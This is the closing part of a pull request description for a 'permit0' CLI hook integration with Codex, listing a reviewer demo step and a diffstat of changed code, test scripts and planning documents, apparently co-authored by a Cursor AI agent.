- [ ] Reviewer: run \`bash integrations/permit0-codex/dev-test-rig/codex-demo\` to reproduce the live demo end-to-end (requires Codex installed)

## Files in this PR

\`\`\`
crates/permit0-cli/src/cmd/hook.rs       1217 ++++++++++++++++++++++++++++++---
crates/permit0-cli/src/main.rs             33 +-
crates/permit0-cli/tests/cli_tests.rs     310 +++++++++
scripts/test-codex-hook.sh                186 +++++
scripts/test-managed-prefs-roundtrip.sh   231 ++++++++++++
integrations/permit0-codex/**            1303 ++++++++++++++++++++++++++++++++
integrations/README.md                     12 +-
docs/plans/codex-integration/03-configuration.md     8 +
docs/plans/codex-integration/07-packaging.md       255 +++++++++++++
docs/plan-reviews/codex-integration/9be273b5/**    127 +++++
docs/plan-reviews/codex-integration/a7ebc31f/07-*  222 +++++++++++
docs/plan-reviews/codex-integration/a7ebc31f/08-*  301 +++++++++++++
docs/plan-reviews/codex-integration/a7ebc31f/00-summary.md      ±±
\`\`\`

🤖 Co-authored-by: Cursor AI agent


Made with [Cursor](https://cursor.com)